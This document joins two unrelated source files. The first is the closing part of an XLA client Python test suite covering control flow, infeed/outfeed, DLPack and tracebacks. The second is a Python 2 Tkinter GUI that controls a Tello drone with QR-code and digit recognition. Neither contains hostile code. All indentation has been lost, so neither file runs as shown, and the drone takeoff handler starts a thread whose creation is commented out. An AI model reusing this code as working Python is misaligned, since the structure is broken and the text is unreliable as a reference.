self._ExecuteAndCompareClose(c, expected=[[[4, 5, 6]], [[10, 8, 9]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testWhile(self, dtype):
def LessThan10Cond():
c = self._NewComputation("test_lt_10")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
ops.Lt(ops.Parameter(c, 0, shape), ops.Constant(c, dtype(10.)))
return c.build()
cond = LessThan10Cond()
body = self._CreateMulBy2Computation(dtype)
c = self._NewComputation()
init = ops.Constant(c, dtype(1.))
ops.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=[16.])
def testConditionalTrue(self):
c = self._NewComputation()
pred = ops.Constant(c, np.bool_(True))
true_operand = ops.Constant(c, np.float32(3.))
true_computation = self._CreateMulBy2Computation(np.float32)
false_operand = ops.Constant(c, np.float32(2.))
false_computation = self._CreateConstantComputation(
np.float32, np.float32)
ops.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=[6.])
def testConditionalFalse(self):
c = self._NewComputation()
pred = ops.Constant(c, np.bool_(False))
true_operand = ops.Constant(c, np.float32(3.))
true_computation = self._CreateMulBy2Computation(np.float32)
false_operand = ops.Constant(c, np.float32(2.))
false_computation = self._CreateConstantComputation(
np.float32, np.float32)
ops.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=[1.])
@unittest.skipIf(cloud_tpu, "not implemented")
def testInfeedS32Values(self):
to_infeed = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
ops.GetTupleElement(
ops.InfeedWithToken(
ops.CreateToken(c),
xla_client.shape_from_pyval(
to_infeed[0]).with_major_to_minor_layout_if_absent()), 0)
compiled_c = self.backend.compile(c.build())
device = self.backend.local_devices()[0]
for item in to_infeed:
device.transfer_to_infeed(item)
for item in to_infeed:
result, = xla_client.execute_with_python_values(
compiled_c, (), backend=self.backend)
self.assertEqual(result, item)
@unittest.skipIf(cloud_tpu, "not implemented")
def testInfeedTuple(self):
to_infeed = (NumpyArrayS32([1, 2, 3, 4]), NumpyArrayS32([[7], [8]]))
c = self._NewComputation()
ops.GetTupleElement(
ops.InfeedWithToken(
ops.CreateToken(c),
xla_client.shape_from_pyval(
to_infeed).with_major_to_minor_layout_if_absent()), 0)
compiled_c = self.backend.compile(c.build())
device = self.backend.local_devices()[0]
device.transfer_to_infeed(to_infeed)
result = xla_client.execute_with_python_values(
compiled_c, (), backend=self.backend)
self.assertLen(result, 2)
np.testing.assert_equal(result[0], to_infeed[0])
np.testing.assert_equal(result[1], to_infeed[1])
@unittest.skipIf(cloud_tpu, "not implemented")
def testInfeedThenOutfeedS32(self):
to_round_trip = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
x_and_token = ops.InfeedWithToken(
ops.CreateToken(c),
xla_client.shape_from_pyval(
to_round_trip[0]).with_major_to_minor_layout_if_absent())
x = ops.GetTupleElement(x_and_token, 0)
token = ops.GetTupleElement(x_and_token, 1)
outfeed_shape = xla_client.shape_from_pyval(
to_round_trip[0]).with_major_to_minor_layout_if_absent()
ops.OutfeedWithToken(x, token, outfeed_shape)
compiled_c = self.backend.compile(c.build())
device = self.backend.local_devices()[0]
for want in to_round_trip:
execution = threading.Thread(target=lambda: compiled_c.execute([]))
execution.start()
device.transfer_to_infeed(want)
got = device.transfer_from_outfeed(outfeed_shape)
execution.join()
self.assertEqual(want, got)
def testScatter(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
scatter_indices = np.array([0, 2], dtype=np.int32)
updates = np.array([[10, 20, 30], [70, 80, 90]], dtype=np.int32)
dnums = xla_client.ScatterDimensionNumbers()
dnums.update_window_dims.append(1)
dnums.inserted_window_dims.append(0)
dnums.scatter_dims_to_operand_dims.append(0)
dnums.index_vector_dim = 1
c = self._NewComputation()
ops.Scatter(
ops.Constant(c, a), ops.Constant(c, scatter_indices),
ops.Constant(c, updates), self._CreateBinaryAddComputation(np.int32),
dnums)
expected = np.array([[10, 21, 32], [3, 4, 5], [76, 87, 98]],
dtype=np.int32)
self._ExecuteAndCompareClose(c, expected=[expected])
class DeviceTest(ComputationTest):
def testPlatform(self):
for device in self.backend.local_devices():
self.assertEqual(device.platform, self.backend.platform)
tests.append(DeviceTest)
class ErrorTest(ComputationTest):
def setUp(self):
super(ErrorTest, self).setUp()
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.s32_scalar_2 = NumpyArrayS32(2)
def testCompileWithWrongElementTypeInLayout(self):
c = self._NewComputation()
c.set_op_metadata(xla_client.CurrentSourceInfoMetadata())
ops.Parameter(c, 0, xla_client.shape_from_pyval(self.s32_scalar_2))
c.clear_op_metadata()
options = xla_client.CompileOptions()
options.argument_layouts = [
xla_client.Shape.array_shape(np.dtype(np.float32), [])
]
def TestFun():
return self.backend.compile(c.build(), compile_options=options)
self.assertRaisesRegex(
RuntimeError, r".*Invalid argument shape.*"
r"expected s32\[\], got f32\[\].*", TestFun)
def testInvokeWithWrongElementType(self):
c = self._NewComputation()
c.set_op_metadata(xla_client.CurrentSourceInfoMetadata())
ops.Parameter(c, 0, xla_client.shape_from_pyval(self.s32_scalar_2))
c.clear_op_metadata()
def TestFun():
return xla_client.execute_with_python_values(
self.backend.compile(c.build()), [self.f32_scalar_2], self.backend)
self.assertRaisesRegex(
RuntimeError, r"Invalid argument: Argument does not match.*"
r"want s32\[\], got f32\[\].*", TestFun)
tests.append(EmbeddedComputationsTest)
class ComputationRootTest(ComputationTest):
"""Tests related to setting the root of the computation."""
def testComputationRootDifferentFromLastOp(self):
c = self._NewComputation()
x = ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(2.0)))
result = ops.Add(x, ops.Constant(c, np.float32(3.14)))
ops.Add(result, ops.Constant(c, np.float32(1.618)))
arg = NumpyArrayF32(1.0)
compiled_c = self.backend.compile(c.build(result))
ans, = xla_client.execute_with_python_values(
compiled_c, [arg], backend=self.backend)
np.testing.assert_allclose(ans, 4.14)
tests.append(ComputationRootTest)
class SetShardingTest(ComputationTest):
"""Tests related to set OpSharding."""
def testSetSharding(self):
c = self._NewComputation()
sharding = xla_client.OpSharding()
sharding.type = sharding.type.REPLICATED
sharding.tile_assignment_dimensions.extend([1])
sharding.tile_assignment_devices.extend([0])
c.set_sharding(sharding)
x = ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(2.0)))
c.clear_sharding()
result = ops.Add(x, ops.Constant(c, np.float32(3.14)))
ops.Add(result, ops.Constant(c, np.float32(1.618)))
arg = NumpyArrayF32(1.0)
compiled_c = self.backend.compile(c.build(result))
ans, = xla_client.execute_with_python_values(
compiled_c, [arg], backend=self.backend)
np.testing.assert_allclose(ans, 4.14)
tests.append(SetShardingTest)
testcase_shapes = [
(),
(1,),
(2, 3),
(2, 0),
(0, 7),
(4, 1, 2),
(2, 1, 3),
(2, 4, 1),
(3, 1),
(1, 3),
]
def FormatShapeAndDtype(shape, dtype):
return "_{}[{}]".format(np.dtype(dtype).name, ",".join(map(str, shape)))
class DLPackTest(parameterized.TestCase):
def setUp(self):
super(DLPackTest, self).setUp()
self.backend = xla_backend()
if self.backend.platform not in ("cpu", "gpu"):
self.skipTest("DLPack requires CPU or GPU")
# pylint: disable=g-complex-comprehension
# pyformat: disable
@parameterized.named_parameters({
"testcase_name": "{}_own={}".format(FormatShapeAndDtype(shape, dtype),
take_ownership),
"dtype": dtype,
"shape": shape,
"take_ownership": take_ownership
} for dtype in dlpack_dtypes for shape in testcase_shapes
for take_ownership in [False, True])
# pyformat: enable
def testRoundTrip(self, dtype, shape, take_ownership):
if dtype == np.bool_:
x = np.random.randint(0, 2, size=shape).astype(np.bool_)
else:
x = np.array(np.random.rand(*shape) * 100, dtype=dtype)
buffer = self.backend.buffer_from_pyval(x)
dlt = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=take_ownership)
del buffer # Free "buffer" to make sure dlt retains ownership.
self.assertEqual(type(dlt).__name__, "PyCapsule")
y = xla_client._xla.dlpack_managed_tensor_to_buffer(dlt, self.backend)
np.testing.assert_array_equal(
x.astype(np.uint8) if dtype == np.bool_ else x, y.to_py())
def testTensorsCanBeConsumedOnceOnly(self):
x = np.array(np.random.rand(3, 4, 5, 6), dtype=np.float32)
buffer = self.backend.buffer_from_pyval(x)
dlt = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=True)
def ConsumeDLPackTensor():
_ = xla_client._xla.dlpack_managed_tensor_to_buffer(dlt, self.backend)
ConsumeDLPackTensor()
self.assertRaisesRegex(
RuntimeError, ".*a DLPack tensor may be consumed at most once.*",
ConsumeDLPackTensor)
def testTensorsCanBeOwnedOnceOnly(self):
x = np.array(np.random.rand(3, 4, 5, 6), dtype=np.float32)
buffer = self.backend.buffer_from_pyval(x)
_ = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=True)
self.assertTrue(buffer.is_deleted())
with self.assertRaisesRegex(
RuntimeError,
"Cannot convert deleted/invalid buffer to DLPack tensor.*"):
_ = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=True)
def testNonOwnedDlpackCanBeViewedTwice(self):
x = np.array(np.random.rand(3, 4, 5, 6), dtype=np.float32)
buffer = self.backend.buffer_from_pyval(x)
d1 = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=False)
d2 = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=False)
y = xla_client._xla.dlpack_managed_tensor_to_buffer(d1, self.backend)
z = xla_client._xla.dlpack_managed_tensor_to_buffer(d2, self.backend)
del d1, d2
np.testing.assert_array_equal(x, buffer.to_py())
np.testing.assert_array_equal(x, y.to_py())
np.testing.assert_array_equal(x, z.to_py())
tests.append(DLPackTest)
class BufferProtocolTest(parameterized.TestCase):
def setUp(self):
super(BufferProtocolTest, self).setUp()
self.backend = xla_backend()
if self.backend.platform != "cpu":
self.skipTest("Test requires CPU")
# pylint: disable=g-complex-comprehension
@parameterized.named_parameters({
"testcase_name": FormatShapeAndDtype(shape, dtype),
"dtype": dtype,
"shape": shape
} for dtype in standard_dtypes if dtype != bfloat16
for shape in testcase_shapes)
def testRoundTrip(self, dtype, shape):
x = np.array(np.random.rand(*shape) * 100, dtype=dtype)
x_ptr = x.__array_interface__["data"][0]
buffer = self.backend.buffer_from_pyval(
x, host_buffer_semantics=xla_client.HostBufferSemantics.ZERO_COPY)
y = np.array(buffer, copy=False)
y_ptr = y.__array_interface__["data"][0]
np.testing.assert_array_equal(x, y)
# If the input was sufficiently aligned, the input and output should
# alias.
self.assertTrue((x_ptr & 15) != 0 or x_ptr == y_ptr)
self.assertEqual(y_ptr, buffer.unsafe_buffer_pointer())
during_call = xla_client.HostBufferSemantics.IMMUTABLE_ONLY_DURING_CALL
buffer2 = self.backend.buffer_from_pyval(
x, host_buffer_semantics=during_call)
z = np.array(buffer2, copy=False)
self.assertNotEqual(x.__array_interface__["data"][0],
z.__array_interface__["data"][0])
def testDeleteWithActiveView(self):
x = np.random.randn(20, 10)
buffer = self.backend.buffer_from_pyval(x)
buffer_ptr = buffer.unsafe_buffer_pointer()
y = np.array(buffer, copy=False)
buffer.delete()
# It is still legal to access `y`; the array view must keep it alive.
np.testing.assert_array_equal(x, y)
self.assertEqual(y.__array_interface__["data"][0], buffer_ptr)
tests.append(BufferProtocolTest)
class TracebackTest(absltest.TestCase):
def setUp(self):
super(TracebackTest, self).setUp()
self.backend = xla_backend()
def testNoTracebacksIfDisabled(self):
with xla_client.tracebacks(enabled=False):
self.assertEqual(None, xla_client.Traceback.get_traceback())
buffer = self.backend.buffer_from_pyval(np.array(7, np.int32))
self.assertEqual(None, buffer.traceback)
b = xla_client.XlaBuilder("computation")
ops.Add(ops.Constant(b, np.int32(1)), ops.Constant(b, np.int32(2)))
e = self.backend.compile(b.build())
self.assertEqual(None, e.traceback)
def assertIsTracebackContaining(self, tb, function):
self.assertIsInstance(tb, xla_client.Traceback)
self.assertIn(function, str(tb))
self.assertTrue(any(f.function_name == function for f in tb.frames))
def testTracebacks(self):
with xla_client.tracebacks(enabled=True):
tb = xla_client.Traceback.get_traceback()
self.assertIsTracebackContaining(tb, "testTracebacks")
# Tracebacks are not implemented on the TPU driver extension's variant
# of buffers and executables.
if not isinstance(self.backend, xla_client.Client):
return
buffer = self.backend.buffer_from_pyval(np.array(7, np.int32))
self.assertIsTracebackContaining(buffer.traceback, "testTracebacks")
b = xla_client.XlaBuilder("computation")
ops.Add(ops.Constant(b, np.int32(1)), ops.Constant(b, np.int32(2)))
e = self.backend.compile(b.build())
self.assertIsTracebackContaining(e.traceback, "testTracebacks")
def testNestedFunction(self):
def AFunction():
def AnotherFunction():
return xla_client.Traceback.get_traceback()
return AnotherFunction()
with xla_client.tracebacks(enabled=True):
tb = AFunction()
self.assertIsInstance(tb, xla_client.Traceback)
frames = tb.frames
i = next(
i for (i, f) in enumerate(frames) if f.function_name == "AFunction")
self.assertEqual(frames[i - 1].function_name, "AnotherFunction")
self.assertEqual(frames[i + 1].function_name, "testNestedFunction")
tests.append(TracebackTest)
class ClientTest(parameterized.TestCase):
def setUp(self):
super(ClientTest, self).setUp()
self.backend = xla_backend()
def testPlatformVersion(self):
version = self.backend.platform_version
if self.backend.platform == "cpu":
self.assertEqual(version, "<unknown>")
elif self.backend.platform == "gpu":
# Following is false if not built with --config=cuda
if test_util.is_gpu_available(cuda_only=True):
self.assertTrue(
re.match(r"^cuda \d{4,}$", version),
msg=f"Expected CUDA version string; got {repr(version)}")
else:
self.assertEqual(version, "<unknown>")
tests.append(ClientTest)
# TODO(b/182461453): Add TFRT and cloud TPU implementation of
# ReadDynamicShapes
class DynamicReshapeTest(ComputationTest):
"""Tests related to DynamicReshape."""
def _CompareToPyAndBufferProtocol(self, builder, args, expected_results,
test_fn):
compiled = self.backend.compile(builder.build())
output_buffers = compiled.execute([
self.backend.buffer_from_pyval(
arg, device=compiled.local_devices()[0]) for arg in args
])
self.assertLen(output_buffers, len(expected_results))
for buf, expected in zip(output_buffers, expected_results):
to_py_result = buf.to_py()
self.assertEqual(expected.shape, to_py_result.shape)
test_fn(expected, to_py_result)
if self.backend.platform == "cpu" and buf.dtype != bfloat16:
mview = memoryview(buf)
self.assertEqual(expected.shape, mview.shape)
test_fn(expected, np.asarray(mview))
else:
# Buffer protocol expected to fail on non-cpu platforms and bfloat16
# Note that np.asarray(buf) doesn't throw an exception. To test if the
# error was thrown properly we must use memoryview(buf).
with self.assertRaises(BufferError):
memoryview(buf)
# 1D reshape of full size, half size, and size of 0.
@unittest.skipIf(cloud_tpu or tfrt_tpu or external_tpu, "not implemented")
@parameterized.parameters((5), (3), (0))
def testReshape1D(self, reshape_size):
full_size = 5
c = self._NewComputation()
arg = np.array(reshape_size, dtype=np.int32)
expected = np.array(range(reshape_size), dtype=np.int32)
p = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg))
ops.DynamicReshape(
ops.Constant(c, NumpyArrayS32(range(full_size))), [p], [full_size],
[True])
self._CompareToPyAndBufferProtocol(c, [arg], [expected],
np.testing.assert_equal)
# 2D reshape with an slice on the minor dimension. We test different types
# where the strides may differ between the host and devices. The reshaped
# physical memory layout is not consecutive, and we test if the program can
# return the correct logical view of the data.
@unittest.skipIf(cloud_tpu or tfrt_tpu or external_tpu, "not implemented")
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes + float_dtypes)
def testReshape2D(self, dtype):
arg0 = np.array([[1, 2, 3], [4, 5, 6]], dtype=dtype)
arg1 = np.array(2, dtype=np.int32)
expected = np.array([[1, 2], [4, 5]], dtype=np.int32)
c = self._NewComputation()
p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
p1 = ops.Parameter(c, 1, xla_client.shape_from_pyval(arg1))
ops.DynamicReshape(p0, [p1, p1], [2, 3], [False, True])
self._CompareToPyAndBufferProtocol(c, [arg0, arg1], [expected],
np.testing.assert_equal)
@unittest.skipIf(cloud_tpu or tfrt_tpu, "not implemented")
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes + float_dtypes)
def testDynamicShapeArgs(self, dtype):
full_size = 10
dynamic_shape_size = 4
# subcomputation 1
binary_add_builder = self._NewComputation()
scalar_shape = xla_client.Shape.scalar_shape(np.dtype(dtype))
ops.Add(
ops.Parameter(binary_add_builder, 0, scalar_shape),
ops.Parameter(binary_add_builder, 1, scalar_shape))
# subcomputation 2
reshape_reduce_builder = self._NewComputation()
dshape = xla_client.Shape.array_shape(
np.dtype(dtype), dims=[full_size], dynamic_dimensions=[True])
reshape_reduce_p = ops.Parameter(reshape_reduce_builder, 0, dshape)
ops.Reduce(
reshape_reduce_builder,
operands=[reshape_reduce_p],
init_values=[ops.Constant(reshape_reduce_builder, dtype(0))],
computation=binary_add_builder.build(),
dimensions_to_reduce=[0])
# main computation: sum(range(full_size)[:dynamic_shape_size])
c = self._NewComputation()
arg = np.array(dynamic_shape_size, dtype=np.int32)
p = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg))
reshaped = ops.DynamicReshape(
ops.Constant(c, np.array(range(full_size), dtype=dtype)), [p],
[full_size], [True])
ops.Call(c, reshape_reduce_builder.build(), operands=(reshaped,))
self._ExecuteAndCompareClose(c, [arg], [dtype(6)])
tests.append(DynamicReshapeTest)
return tests
def InstantiateTests(globals_dict, backend_fn, test_prefix="", **kw):
# Avoid creating a new backend per test (this causes GPU OOM, and is probably
# inefficient).
backend_fn = functools.lru_cache(maxsize=None)(backend_fn)
for klass in TestFactory(backend_fn, **kw):
test = type(test_prefix + klass.__name__, (klass,), {})
# Clean up the qualified names of the tests to not include the test factory.
test.__qualname__ = test.__name__
globals_dict[test.__name__] = test
backends = {
"cpu": xla_client.make_cpu_client,
"gpu": xla_client.make_gpu_client,
}
if __name__ == "__main__":
flags.DEFINE_string("backend", "cpu", "Target platform.")
# pylint: disable=unnecessary-lambda
InstantiateTests(globals(), lambda: backends[FLAGS.backend]())
# pylint: enable=unnecessary-lambda
absltest.main()
|
tello_control_ui.py | from PIL import Image
from PIL import ImageTk
import Tkinter as tki
from Tkinter import Toplevel, Scale
import threading
import datetime
import cv2
import os
import time
import platform
import tello_QR_code
import tello_num
class TelloUI:
"""Wrapper class to enable the GUI."""
def __init__(self, tello, outputpath):
"""
Initial all the element of the GUI,support by Tkinter
:param tello: class interacts with the Tello drone.
Raises:
RuntimeError: If the Tello rejects the attempt to enter command mode.
"""
self.tello = tello # videostream device
self.outputPath = outputpath # the path that save pictures created by clicking the takeSnapshot button
self.frame = None # frame read from h264decoder and used for pose recognition
self.thread = None # thread of the Tkinter mainloop
self.stopEvent = None
self.code_flag = 0
self.barcodeType = ''
self.barcodeData = ''
self.num = -1
# control variables
self.distance = 0.1 # default distance for 'move' cmd
self.degree = 30 # default degree for 'cw' or 'ccw' cmd
# if the pose recognition mode is opened
self.pose_mode = False
# if the flag is TRUE,the auto-takeoff thread will stop waiting for the response from tello
self.quit_waiting_flag = False
# if the flag is TRUE,the pose recognition skeleton will be drawn on the GUI picture
self.draw_skeleton_flag = False
# record the coordinates of the nodes in the pose recognition skeleton
self.points = []
# list of all the possible connections between skeleton nodes
self.POSE_PAIRS = [[0, 1], [1, 2], [2, 3], [3, 4], [1, 5], [5, 6], [6, 7], [1, 14], [14, 8], [8, 9], [9, 10],
[14, 11], [11, 12], [12, 13]]
# initialize the root window and image panel
self.root = tki.Tk()
self.panel = None
# self.panel_for_pose_handle_show = None
# create buttons
self.btn_snapshot = tki.Button(self.root, text="Snapshot!",
command=self.takeSnapshot)
self.btn_snapshot.pack(side="bottom", fill="both",
expand="yes", padx=10, pady=5)
self.btn_pose = tki.Button(self.root, text="QR code Recognition Status: Off",
command=self.setPoseMode)
self.btn_pose.pack(side="bottom", fill="both",
expand="yes", padx=10, pady=5)
self.btn_pause = tki.Button(self.root, text="Pause", relief="raised", command=self.pauseVideo)
self.btn_pause.pack(side="bottom", fill="both",
expand="yes", padx=10, pady=5)
self.btn_landing = tki.Button(
self.root, text="Open Command Panel", relief="raised", command=self.openCmdWindow)
self.btn_landing.pack(side="bottom", fill="both",
expand="yes", padx=10, pady=5)
# start a thread that constantly pools the video sensor for
# the most recently read frame
self.stopEvent = threading.Event()
self.thread = threading.Thread(target=self.videoLoop, args=())
self.thread.start()
# set a callback to handle when the window is closed
self.root.wm_title("TELLO Controller")
self.root.wm_protocol("WM_DELETE_WINDOW", self.onClose)
# the auto-takeoff thread will start if the 'takeoff' button on command window is clicked
# self.auto_takeoff_thread = threading.Thread(target=self._autoTakeoff)
# the sending_command will send command to tello every 5 seconds
self.sending_command_thread = threading.Thread(target=self._sendingCommand)
self.get_GUI_Image_thread = threading.Thread(target=self._getGUIImage)
def videoLoop(self):
"""
The mainloop thread of Tkinter
Raises:
RuntimeError: To get around a RunTime error that Tkinter throws due to threading.
"""
try:
# start the thread that get GUI image and drwa skeleton
time.sleep(0.5)
self.get_GUI_Image_thread.start()
while not self.stopEvent.is_set():
# read the frame for pose recognition
self.frame = self.tello.read()
# cv2.cvtColor(self.frame, cv2.COLOR_RGB2BGR)
if self.pose_mode:
if not self.code_flag:
self.barcodeType, self.barcodeData = tello_QR_code.QR_code_detect(self.frame)
if self.barcodeType == 'QRCODE':
self.telloMoveRight(0.5)
time.sleep(2)
else:
self.num = tello_num.number_detect(self.frame)
print "[INFO]find num:" + str(self.num)
if self.frame is None or self.frame.size == 0:
continue
if self.barcodeType == 'QRCODE':
self.code_flag = 1
else:
print "[INFO]QR code information is invalid!"
if self.code_flag:
if self.barcodeData == str(self.num):
self.telloFlip_b()
#time.sleep(1)
#self.telloLanding()
else:
if self.num != 0:
self.telloMoveRight(0.45)
time.sleep(1)
else:
self.telloMoveBackward(0.1)
time.sleep(1)
except RuntimeError, e:
print("[INFO] caught a RuntimeError")
def _getGUIImage(self):
"""
Main operation to read frames from h264decoder and draw skeleton on
frames if the pose mode is opened
"""
# read the system of your computer
system = platform.system()
while not self.stopEvent.is_set():
# read the frame for GUI show
frame = self.tello.read()
if frame is None or frame.size == 0:
continue
if self.pose_mode:
# Draw the detected skeleton points
for i in range(15):
if self.draw_skeleton_flag == True:
cv2.circle(frame, self.points[i], 8, (0, 255, 255), thickness=-1, lineType=cv2.FILLED)
cv2.putText(frame, "{}".format(i), self.points[i], cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2,
lineType=cv2.LINE_AA)
# Draw Skeleton
# for pair in self.POSE_PAIRS:
# partA = pair[0]
# partB = pair[1]
# if self.points[partA] and self.points[partB]:
# cv2.line(frame, self.points[partA], self.points[partB], (0, 255, 255), 2)
# cv2.circle(frame, self.points[partA], 8, (0, 0, 255), thickness=-1, lineType=cv2.FILLED)
# transfer the format from frame to image
image = Image.fromarray(frame)
# we found compatibility problem between Tkinter,PIL and Macos,and it will
# sometimes result the very long preriod of the "ImageTk.PhotoImage" function,
# so for Macos,we start a new thread to execute the _updateGUIImage function.
if system == "Windows" or system == "Linux":
self._updateGUIImage(image)
else:
thread_tmp = threading.Thread(target=self._updateGUIImage, args=(image,))
thread_tmp.start()
time.sleep(0.03)
def _updateGUIImage(self, image):
"""
Main operation to initial the object of image,and update the GUI panel
"""
image = ImageTk.PhotoImage(image)
# if the panel none ,we need to initial it
if self.panel is None:
self.panel = tki.Label(image=image)
self.panel.image = image
self.panel.pack(side="left", padx=10, pady=10)
# otherwise, simply update the panel
else:
self.panel.configure(image=image)
self.panel.image = image
# def _autoTakeoff(self):
# """
# Firstly,it will waiting for the response that will be sent by Tello if Tello
#
# finish the takeoff command.If computer doesn't receive the response,it may be
#
# because tello doesn't takeoff normally,or because the UDP pack of response is
#
# lost.So in order to confirm the reason,computer will send 'height?'command to
#
# get several real-time height datas and get a average value.If the height is in
#
# normal range,tello will execute the moveup command.Otherwise,tello will land.
#
# Finally,the sending-command thread will start.
# """
# response = None
# height_tmp = 0 # temp variable to content value of height
# height_val = 0 # average value of height
# cnt = 0 # effective number of height reading
# timeout = 6 # max waiting time of tello's response
#
# timer = threading.Timer(timeout, self._setQuitWaitingFlag)
# timer.start()
#
# # waiting for the response from tello
# while response != 'ok':
# if self.quit_waiting_flag is True:
# break
# response = self.tello.get_response()
# print "ack:%s" % response
# timer.cancel()
#
# # receive the correct response
# if response == 'ok':
# self.tello.move_up(0.5)
#
# # calculate the height of tello
# else:
# for i in range(0, 50):
# height_tmp = self.tello.get_height()
# try:
# height_val = height_val + height_tmp
# cnt = cnt + 1
# print height_tmp, cnt
# except:
# height_val = height_val
#
# height_val = height_val / cnt
#
# # if the height value is in normal range
# if height_val == 9 or height_val == 10 or height_val == 11:
# self.tello.move_up(0.5)
# else:
# self.tello.land()
# # start the sendingCmd thread
# self.sending_command_thread.start()
def _sendingCommand(self):
"""
start a while loop that sends 'command' to tello every 5 second
"""
while True:
self.tello.send_command('command')
time.sleep(5)
def _setQuitWaitingFlag(self):
"""
set the variable as TRUE,it will stop computer waiting for response from tello
"""
self.quit_waiting_flag = True
def openCmdWindow(self):
"""
open the cmd window and initial all the button and text
"""
panel = Toplevel(self.root)
panel.wm_title("Command Panel")
# create text input entry
text0 = tki.Label(panel,
text='This Controller map keyboard inputs to Tello control commands\n'
'Adjust the trackbar to reset distance and degree parameter',
font='Helvetica 10 bold'
)
text0.pack(side='top')
text1 = tki.Label(panel, text=
'W - Move Tello Up\t\t\tArrow Up - Move Tello Forward\n'
'S - Move Tello Down\t\t\tArrow Down - Move Tello Backward\n'
'A - Rotate Tello Counter-Clockwise\tArrow Left - Move Tello Left\n'
'D - Rotate Tello Clockwise\t\tArrow Right - Move Tello Right',
justify="left")
text1.pack(side="top")
self.btn_landing = tki.Button(
panel, text="Land", relief="raised", command=self.telloLanding)
self.btn_landing.pack(side="bottom", fill="both",
expand="yes", padx=10, pady=5)
self.btn_takeoff = tki.Button(
panel, text="Takeoff", relief="raised", command=self.telloTakeOff)
self.btn_takeoff.pack(side="bottom", fill="both",
expand="yes", padx=10, pady=5)
# binding arrow keys to drone control
self.tmp_f = tki.Frame(panel, width=100, height=2)
self.tmp_f.bind('<KeyPress-w>', self.on_keypress_w)
self.tmp_f.bind('<KeyPress-s>', self.on_keypress_s)
self.tmp_f.bind('<KeyPress-a>', self.on_keypress_a)
self.tmp_f.bind('<KeyPress-d>', self.on_keypress_d)
self.tmp_f.bind('<KeyPress-Up>', self.on_keypress_up)
self.tmp_f.bind('<KeyPress-Down>', self.on_keypress_down)
self.tmp_f.bind('<KeyPress-Left>', self.on_keypress_left)
self.tmp_f.bind('<KeyPress-Right>', self.on_keypress_right)
self.tmp_f.pack(side="bottom")
self.tmp_f.focus_set()
self.btn_landing = tki.Button(
panel, text="Flip", relief="raised", command=self.openFlipWindow)
self.btn_landing.pack(side="bottom", fill="both",
expand="yes", padx=10, pady=5)
self.distance_bar = Scale(panel, from_=0.02, to=5, tickinterval=0.01, digits=3, label='Distance(m)',
resolution=0.01)
self.distance_bar.set(0.2)
self.distance_bar.pack(side="left")
self.btn_distance = tki.Button(panel, text="Reset Distance", relief="raised",
command=self.updateDistancebar,
)
self.btn_distance.pack(side="left", fill="both",
expand="yes", padx=10, pady=5)
self.degree_bar = Scale(panel, from_=1, to=360, tickinterval=10, label='Degree')
self.degree_bar.set(30)
self.degree_bar.pack(side="right")
self.btn_distance = tki.Button(panel, text="Reset Degree", relief="raised", command=self.updateDegreebar)
self.btn_distance.pack(side="right", fill="both",
expand="yes", padx=10, pady=5)
def openFlipWindow(self):
"""
open the flip window and initial all the button and text
"""
panel = Toplevel(self.root)
panel.wm_title("Gesture Recognition")
self.btn_flipl = tki.Button(
panel, text="Flip Left", relief="raised", command=self.telloFlip_l)
self.btn_flipl.pack(side="bottom", fill="both",
expand="yes", padx=10, pady=5)
self.btn_flipr = tki.Button(
panel, text="Flip Right", relief="raised", command=self.telloFlip_r)
self.btn_flipr.pack(side="bottom", fill="both",
expand="yes", padx=10, pady=5)
self.btn_flipf = tki.Button(
panel, text="Flip Forward", relief="raised", command=self.telloFlip_f)
self.btn_flipf.pack(side="bottom", fill="both",
expand="yes", padx=10, pady=5)
self.btn_flipb = tki.Button(
panel, text="Flip Backward", relief="raised", command=self.telloFlip_b)
self.btn_flipb.pack(side="bottom", fill="both",
expand="yes", padx=10, pady=5)
def takeSnapshot(self):
"""
save the current frame of the video as a jpg file and put it into outputpath
"""
# grab the current timestamp and use it to construct the filename
ts = datetime.datetime.now()
filename = "{}.jpg".format(ts.strftime("%Y-%m-%d_%H-%M-%S"))
p = os.path.sep.join((self.outputPath, filename))
# save the file
cv2.imwrite(p, cv2.cvtColor(self.frame, cv2.COLOR_RGB2BGR))
print("[INFO] saved {}".format(filename))
def setPoseMode(self):
"""
Toggle the open/close of pose recognition mode
"""
if self.pose_mode is False:
self.pose_mode = True
self.btn_pose.config(text='QR code Recognition Status: On')
else:
self.pose_mode = False
self.btn_pose.config(text='QR code Recognition Status: Off')
def pauseVideo(self):
"""
Toggle the freeze/unfreze of video
"""
if self.btn_pause.config('relief')[-1] == 'sunken':
self.btn_pause.config(relief="raised")
self.tello.video_freeze(False)
else:
self.btn_pause.config(relief="sunken")
self.tello.video_freeze(True)
def telloTakeOff(self):
"""
send the takeoff command to tello,and wait for the first response,
if get the 'error'response,remind the "battery low" warning.Otherwise,
start the auto-takeoff thread
"""
takeoff_response = None
self.tello.takeoff()
time.sleep(0.2)
takeoff_response = self.tello.get_response()
if takeoff_response != 'error':
self.auto_takeoff_thread.start()
else:
print "battery low,please repalce with a new one"
def telloLanding(self):
return self.tello.land()
